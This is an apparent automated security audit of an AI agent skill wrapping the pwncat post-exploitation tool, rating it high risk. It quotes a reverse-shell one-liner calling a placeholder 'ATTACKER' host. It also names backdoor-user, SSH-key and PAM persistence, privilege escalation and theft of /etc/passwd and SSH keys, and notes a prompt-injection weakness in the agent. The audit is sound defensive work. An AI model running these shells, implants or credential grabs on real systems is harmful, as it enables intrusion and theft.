skills/aeondave/malskill/pwncat/Gen Agent Trust Hub

pwncat

Fail

Audited by Gen Agent Trust Hub on Sep 5, 2026

Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONPRIVILEGE_ESCALATIONPERSISTENCEDATA_EXFILTRATIONINDIRECT_PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill provides extensive instructions for using the pwncat-cs command-line tool to manage remote shell sessions.
  • Found in SKILL.md and references/connection-modes-and-opsec.md, documenting listener setup and bind shell connections.
  • Documentation encourages executing shell commands on remote targets such as id, uname -a, and chmod +x.
  • [REMOTE_CODE_EXECUTION]: The skill provides patterns for establishing interactive reverse shell connections.
  • SKILL.md and references/connection-modes-and-opsec.md contain the bash -i >& /dev/tcp/ATTACKER/4444 0>&1 pattern for target callbacks.
  • [PRIVILEGE_ESCALATION]: The skill details workflows to programmatically acquire elevated permissions on a target system.
  • SKILL.md and references/module-workflow-cheatsheet.md describe using escalate list and escalate run to discover and exploit privilege escalation paths, including recursive chaining to reach root.
  • [PERSISTENCE]: The skill documents the use of implant modules to maintain access across sessions.
  • SKILL.md and references/module-workflow-cheatsheet.md describe installing authorized SSH keys via implant.authorized_key.
  • Documentation includes instructions for implant.passwd to create backdoor users (svc-backup) and implant.pam to modify authentication modules.
  • [DATA_EXFILTRATION]: The skill includes patterns for accessing and downloading sensitive configuration and identity files.
  • SKILL.md demonstrates using the download command for /etc/passwd.
  • Documentation references reading SSH identity files from ~/.ssh/id_rsa and ~/.ssh/id_rsa.pub.
  • [INDIRECT_PROMPT_INJECTION]: The skill defines a workflow where the agent processes untrusted output from a remote target.
  • Ingestion points: The agent reads and reacts to the output of a remote tty in 'remote mode' (documented in SKILL.md).
  • Boundary markers: None provided; the agent is not instructed to disregard or sanitize instructions that may be emitted by the target system into the shell buffer.
  • Capability inventory: Across all files, the skill grants the agent capabilities for shell command execution, file system modification, privilege escalation, and persistence management.
  • Sanitization: There is no documented validation or escaping of terminal output before it is processed by the agent's logic.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Sep 5, 2026, 10:40 PM
Security Audit — agent-trust-hub — pwncat